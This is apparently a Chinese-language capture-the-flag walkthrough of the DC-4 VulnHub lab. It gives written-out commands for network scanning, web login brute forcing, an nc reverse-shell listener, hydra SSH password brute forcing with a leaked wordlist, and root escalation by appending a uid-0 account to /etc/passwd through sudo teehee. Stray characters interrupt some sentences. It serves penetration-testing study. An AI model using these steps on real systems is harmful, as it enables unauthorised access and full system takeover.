CTF-DC4靶機攻防

實驗環(huán)境準備：

kali：172.25.0.69
DC-4: MAC地址：00:0c:29:4c:aa:59
DC4靶機下載地址：https://www.vulnhub.com/entry/dc-4,313/

0x01主機發(fā)現(xiàn)

通過ARP抓包，匹配MAC地址竟纳，得到DC4靶機ip為172.25.0.66

kali@kali:~$ sudo netdiscover -i eth0 -r 172.25.0.0/24
 Currently scanning: Finished!   |   Screen View: Unique Hosts                        
                                                                                      
 103 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 6180                   
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 172.25.0.1      00:50:56:c0:00:08     46    2760  VMware, Inc.                       
 172.25.0.2      00:50:56:f8:42:a0     28    1680  VMware, Inc.                       
 172.25.0.66     00:0c:29:4c:aa:59     28    1680  VMware, Inc.                       
 172.25.0.100    00:50:56:f7:88:92      1      60  VMware, Inc.

0x02 端口掃描

探測發(fā)現(xiàn)DC4主機在22端口開啟了ssh服務(wù)更哄，80端口開啟了http服務(wù)。

kali@kali:~$ nmap -A -p- 172.25.0.66
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-24 21:52 EST
Nmap scan report for 172.25.0.66
Host is up (0.00025s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 8d:60:57:06:6c:27:e0:2f:76:2c:e6:42:c0:01:ba:25 (RSA)
|   256 e7:83:8c:d7:bb:84:f3:2e:e8:a2:5f:79:6f:8e:19:30 (ECDSA)
|_  256 fd:39:47:8a:5e:58:33:99:73:73:9e:22:7f:90:4f:4b (ED25519)
80/tcp open  http    nginx 1.15.10
|_http-server-header: nginx/1.15.10
|_http-title: System Tools
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.70 seconds

0x03 爆破

使用bp來進行后臺爆破
bp代理抓包

image.png

將抓到的包轉(zhuǎn)發(fā)到intruder模塊來進行暴力破解
首先我們要準備一個用戶名字典和密碼字典
字典參考鏈接：https://github.com/TheKingOfDuck/fuzzDicts
爆破得到admin用戶的密碼為happy

image.png

發(fā)現(xiàn)該網(wǎng)站可執(zhí)行系統(tǒng)命令

image.png

抓包改包發(fā)現(xiàn)可執(zhí)行任意命令

image.png

cat /etc/passwd收集發(fā)現(xiàn)可登錄shell用戶為：root charless jim sam
并創(chuàng)建用戶名字典：user.dic

nc反彈shell

image.png

kali@kali:~$ nc -lvvp 1234
listening on [any] 1234 ...
172.25.0.66: inverse host lookup failed: Unknown host
connect to [172.25.0.69] from (UNKNOWN) [172.25.0.66] 39862
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@dc-4:/home/jim/backups$ cat old-passwords.bak    //在jim家目錄下發(fā)現(xiàn)密碼備份文件
cat old-passwords.bak
000000
12345
iloveyou
1q2w3e4r5t
1234
123456a
qwertyuiop
monkey
123321
dragon
654321
666666
123
myspace1
a123456
121212
1qaz2wsx
123qwe
123abc
tinkle
target123
gwerty
1g2w3e4r
gwerty123
zag12wsx
7777777
qwerty1
1q2w3e4r
987654321
222222
qwe123
qwerty123
zxcvbnm
555555
112233
fuckyou
asdfghjkl
12345a
123123123
1q2w3e
qazwsx
loveme1
juventus
jennifer1
!~!1
bubbles
samuel
fuckoff
lovers
cheese1
0123456
123asd
999999999
madison
elizabeth1
music
buster1
lauren
david1
tigger1
123qweasd
taylor1
carlos
tinkerbell
samantha1
Sojdlg123aljg
joshua1
poop
stella
myspace123
asdasd5
freedom1
whatever1
xxxxxx
00000
valentina
a1b2c3
741852963
austin
monica
qaz123
lovely1
music1
harley1
family1
spongebob1
steven
nirvana
1234abcd
hellokitty
thomas1
cooper
520520
muffin
christian1
love13
fucku2
arsenal1
lucky7
diablo
apples
george1
babyboy1
crystal
1122334455
player1
aa123456
vfhbyf
forever1
Password
winston
chivas1
sexy
hockey1
1a2b3c4d
pussy
playboy1
stalker
cherry
tweety
toyota
creative
gemini
pretty1
maverick
brittany1
nathan1
letmein1
cameron1
secret1
google1
heaven
martina
murphy
spongebob
uQA9Ebw445
fernando
pretty
startfinding
softball
dolphin1
fuckme
test123
qwerty1234
kobe24
alejandro
adrian
september
aaaaaa1
bubba1
isabella
abc123456
password3
jason1
abcdefg123
loveyou1
shannon
100200
manuel
leonardo
molly1
flowers
123456z
007007
password.
321321
miguel
samsung1
sergey
sweet1
abc1234
windows
qwert123
vfrcbv
poohbear
d123456
school1
badboy
951753
123456c
111
steven1
snoopy1
garfield
YAgjecc826
compaq
candy1
sarah1
qwerty123456
123456l
eminem1
141414
789789
maria
steelers
iloveme1
morgan1
winner
boomer
lolita
nastya
alexis1
carmen
angelo
nicholas1
portugal
precious
jackass1
jonathan1
yfnfif
bitch
tiffany
rabbit
rainbow1
angel123
popcorn
barbara
brandy
starwars1
barney
natalia
jibril04
hiphop
tiffany1
shorty
poohbear1
simone
albert
marlboro
hardcore
cowboys
sydney
alex
scorpio
1234512345
q12345
qq123456
onelove
bond007
abcdefg1
eagles
crystal1
azertyuiop
winter
sexy12
angelina
james
svetlana
fatima
123456k
icecream
popcorn1

創(chuàng)建密碼字典oldpassword啸如，使用hydra工具進行ssh服務(wù)密碼爆破

kali@kali:~$ hydra ssh://172.25.0.66 -L user.dic -P oldpassword.dic -vV -s 22 -t 50 -o hydra.ssh
kali@kali:~$ cat hydra.ssh 
# Hydra v9.0 run at 2020-02-24 22:55:31 on 172.25.0.66 ssh (hydra -L user.dic -P oldpassword.dic -vV -s 22 -t 50 -o hydra.ssh ssh://172.25.0.66)
[22][ssh] host: 172.25.0.66   login: jim   password: jibril04

爆破得到j(luò)im用戶的密碼侍匙，進行ssh登錄。
信息收集叮雳，查看郵件信息得到charles用戶的密碼想暗。

jim@dc-4:~$ cat /var/mail/jim 
From charles@dc-4 Sat Apr 06 21:15:46 2019
Return-path: <charles@dc-4>
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 21:15:46 +1000
Received: from charles by dc-4 with local (Exim 4.89)
        (envelope-from <charles@dc-4>)
        id 1hCjIX-0000kO-Qt
        for jim@dc-4; Sat, 06 Apr 2019 21:15:45 +1000
To: jim@dc-4
Subject: Holidays
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1hCjIX-0000kO-Qt@dc-4>
From: Charles <charles@dc-4>
Date: Sat, 06 Apr 2019 21:15:45 +1000
Status: O

Hi Jim,

I'm heading off on holidays at the end of today, so the boss asked me to give you my password just in case anything goes wrong.

Password is:  ^xHhA&hvim0y

See ya,
Charles

切換用戶到charles

jim@dc-4:~$ su - charles 
Password: 
charles@dc-4:~$ ls
charles@dc-4:~$ sudo -l
Matching Defaults entries for charles on dc-4:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User charles may run the following commands on dc-4:
    (root) NOPASSWD: /usr/bin/teehee

0x04 提權(quán)

發(fā)現(xiàn)teehee命令具有以root用戶身份執(zhí)行的權(quán)限
使用teehee命令特性創(chuàng)建一個uid=0的用戶

charles@dc-4:~$ sudo teehee -a  /etc/passwd
WuHanJiaYou::0:0:::/bin/bash
^c
charles@dc-4:~$ su - WuHanJiaYou
No directory, logging in with HOME=/
root@dc-4:/# cd /root
root@dc-4:/root# ls
flag.txt
root@dc-4:/root# cat flag.txt 



888       888          888 888      8888888b.                             888 888 888 888 
888   o   888          888 888      888  "Y88b                            888 888 888 888 
888  d8b  888          888 888      888    888                            888 888 888 888 
888 d888b 888  .d88b.  888 888      888    888  .d88b.  88888b.   .d88b.  888 888 888 888 
888d88888b888 d8P  Y8b 888 888      888    888 d88""88b 888 "88b d8P  Y8b 888 888 888 888 
88888P Y88888 88888888 888 888      888    888 888  888 888  888 88888888 Y8P Y8P Y8P Y8P 
8888P   Y8888 Y8b.     888 888      888  .d88P Y88..88P 888  888 Y8b.      "   "   "   "  
888P     Y888  "Y8888  888 888      8888888P"   "Y88P"  888  888  "Y8888  888 888 888 888 


Congratulations!!!

Hope you enjoyed DC-4.  Just wanted to send a big thanks out there to all those
who have provided feedback, and who have taken time to complete these little
challenges.

If you enjoyed this CTF, send me a tweet via @DCAU7.

至此提權(quán)成功妇汗，并拿到了DC4的flag